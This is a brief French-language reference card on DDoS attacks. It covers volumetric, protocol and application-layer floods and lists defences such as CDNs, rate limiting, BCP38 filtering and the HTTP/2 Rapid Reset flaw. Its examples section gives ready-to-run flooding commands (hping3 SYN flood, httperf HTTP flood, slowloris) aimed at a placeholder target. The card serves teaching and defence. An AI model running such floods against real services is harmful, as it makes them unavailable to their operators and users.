DDoS — Déni de service distribué

DoS Volumétrique

Types d'attaques DDoS

Un DDoS (Distributed Denial of Service) vise à rendre un service indisponible en le saturant de requêtes provenant de nombreuses sources (botnet). Trois grandes catégories : volumétrique (saturer la bande passante), protocolaire (saturer les tables d'état), applicatif (saturer le CPU).

Exemples d'attaques

# Volumétrique : amplification UDP/DNS
# Attaquant envoie petite requête avec IP=victime
# Serveur répond avec une réponse énorme -> victime

# SYN Flood : saturer les connexions half-open
hping3 -S --flood -p 80 target

# HTTP Flood : saturer le serveur web
httperf --server target --rate 1000 --num-conn 10000

# Slowloris : connexions HTTP très lentes
slowloris.py target -p 80 -s 500

Défenses

CDN (Cloudflare, Akamai) absorbe le trafic · Rate limiting · Filtrage BCP38 (anti-IP spoofing) · Anycast pour distribuer la charge · Blackholing des IPs sources · CVE-2023-44487 "HTTP/2 Rapid Reset" : DDoS record en réinitialisant des flux (CVSS 7.5)